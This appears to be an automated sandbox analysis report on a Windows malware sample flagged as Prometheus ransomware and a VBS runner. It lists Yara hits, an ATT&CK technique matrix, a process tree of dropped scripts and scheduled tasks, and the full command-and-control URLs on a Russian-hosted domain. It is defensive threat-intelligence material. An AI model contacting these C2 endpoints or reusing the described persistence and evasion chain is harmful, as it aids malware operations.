            Source: Yara matchFile source: 00000013.00000002.1571279590.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1476955180.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1571279590.000000000279D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1611979914.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1476955180.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1480370070.000000001344D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SurrogateContainerAgent.exe PID: 7676, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 7108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 2156, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 1868, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 5336, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 4460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 3592, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information12
            Scripting            		Valid Accounts241
            Windows Management Instrumentation            		12
            Scripting            		1
            DLL Side-Loading            		31
            Disable or Modify Tools            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            Bypass User Account Control            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory3
            File and Directory Discovery            		Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		11
            Process Injection            		2
            Obfuscated Files or Information            		Security Account Manager57
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Scheduled Task/Job            		11
            Software Packing            		NTDS261
            Security Software Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Bypass User Account Control            		Cached Domain Credentials151
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Modify Registry            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520355 Sample: adKGhCOOzg.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 111 a1025223.xsph.ru 2->111 115 Suricata IDS alerts for network traffic 2->115 117 Found malware configuration 2->117 119 Malicious sample detected (through community Yara rule) 2->119 121 13 other signatures 2->121 15 adKGhCOOzg.exe 3 6 2->15         started        18 zTShuhFeOCWKXCInUCSTgJmE.exe 14 7 2->18         started        21 zTShuhFeOCWKXCInUCSTgJmE.exe 2 2->21         started        signatures3 process4 dnsIp5 101 C:\...\SurrogateContainerAgent.exe, PE32 15->101 dropped 103 C:\portcontainerRef\myQbMgAKm.vbe, data 15->103 dropped 24 wscript.exe 1 15->24         started        113 a1025223.xsph.ru 141.8.194.149, 49714, 49715, 49716 SPRINTHOSTRU Russian Federation 18->113 105 826f54c5c35521aef4...44affffb02e2dfd.exe, PE32 18->105 dropped 107 f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs, ASCII 18->107 dropped 109 d652d8e0-fd2b-4425-99bd-1792324a729f.vbs, ASCII 18->109 dropped 27 wscript.exe 18->27         started        29 wscript.exe 18->29         started        123 Antivirus detection for dropped file 21->123 125 Multi AV Scanner detection for dropped file 21->125 127 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->127 129 Machine Learning detection for dropped file 21->129 file6 signatures7 process8 signatures9 143 Windows Scripting host queries suspicious COM object (likely to drop second stage) 24->143 31 cmd.exe 1 24->31         started        33 zTShuhFeOCWKXCInUCSTgJmE.exe 27->33         started        process10 file11 36 SurrogateContainerAgent.exe 4 8 31->36         started        40 reg.exe 31->40         started        42 conhost.exe 31->42         started        81 edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs, ASCII 33->81 dropped 83 a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs, ASCII 33->83 dropped 44 wscript.exe 33->44         started        46 wscript.exe 33->46         started        process12 file13 85 C:\...\zTShuhFeOCWKXCInUCSTgJmE.exe, PE32 36->85 dropped 87 C:\Users\user\AppData\...\suxlltqCa3.bat, DOS 36->87 dropped 131 Antivirus detection for dropped file 36->131 133 Multi AV Scanner detection for dropped file 36->133 135 Machine Learning detection for dropped file 36->135 141 4 other signatures 36->141 48 cmd.exe 1 36->48         started        50 schtasks.exe 36->50         started        52 schtasks.exe 36->52         started        57 4 other processes 36->57 137 Disable Task Manager(disabletaskmgr) 40->137 139 Disables the Windows task manager (taskmgr) 40->139 54 zTShuhFeOCWKXCInUCSTgJmE.exe 44->54         started        signatures14 process15 file16 59 w32tm.exe 1 48->59         started        61 conhost.exe 48->61         started        63 zTShuhFeOCWKXCInUCSTgJmE.exe 48->63         started        93 91745221-1208-4818-9185-e92567cf8b4d.vbs, ASCII 54->93 dropped 95 5607663c-c622-426c-855c-ef5fb85dae90.vbs, ASCII 54->95 dropped 65 wscript.exe 54->65         started        67 wscript.exe 54->67         started        process17 process18 69 zTShuhFeOCWKXCInUCSTgJmE.exe 65->69         started        file19 89 9e72009f-739b-4ea4-b505-4e802e14614f.vbs, ASCII 69->89 dropped 91 8636c2ce-b0e0-4557-b01c-75132397eb84.vbs, ASCII 69->91 dropped 72 wscript.exe 69->72         started        74 wscript.exe 69->74         started        process20 process21 76 zTShuhFeOCWKXCInUCSTgJmE.exe 72->76         started        file22 97 c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs, ASCII 76->97 dropped 99 1aed32cf-2de1-4530-92b6-4347a499f45a.vbs, ASCII 76->99 dropped 79 wscript.exe 76->79         started        process23

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            adKGhCOOzg.exe71%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            adKGhCOOzg.exe100%AviraVBS/Runner.VPG
            adKGhCOOzg.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs100%AviraVBS/Runner.VPXJ
            C:\portcontainerRef\myQbMgAKm.vbe100%AviraVBS/Runner.VPG
            C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs100%AviraVBS/Runner.VPXJ
            C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs100%AviraVBS/Runner.VPXJ
            C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs100%AviraVBS/Runner.VPXJ
            C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs100%AviraVBS/Starter.VPVT
            C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs100%AviraVBS/Runner.VPXJ
            C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs100%AviraVBS/Starter.VPVT
            C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs100%AviraVBS/Runner.VPXJ
            C:\portcontainerRef\SurrogateContainerAgent.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat100%AviraBAT/Delbat.C
            C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs100%AviraVBS/Starter.VPVT
            C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs100%AviraVBS/Starter.VPVT
            C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs100%AviraVBS/Starter.VPVT
            C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs100%AviraVBS/Starter.VPVT
            C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe100%Joe Sandbox ML
            C:\portcontainerRef\SurrogateContainerAgent.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\portcontainerRef\SurrogateContainerAgent.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://index.from.sh/pages/game.html0%Avira URL Cloudsafe
            https://cp.sprinthost.ru0%Avira URL Cloudsafe
            http://a1025223.xsph.ru/100%Avira URL Cloudmalware
            https://cp.sprinthost.ru/auth/login0%Avira URL Cloudsafe
            http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad0100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtr100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc100%Avira URL Cloudmalware
            http://a1025223.xsph.ru100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme100%Avira URL Cloudmalware
            http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            a1025223.xsph.ru
            		141.8.194.149
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0true
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPTtrue
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvFtrue
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsztrue
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNmetrue
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGctrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://cp.sprinthost.ruzTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://index.from.sh/pages/game.htmlzTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrzTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad0zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://cp.sprinthost.ru/auth/loginzTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://a1025223.xsph.ru/zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003992000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410ddzTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000003059000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1705381265.000000001BE4F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
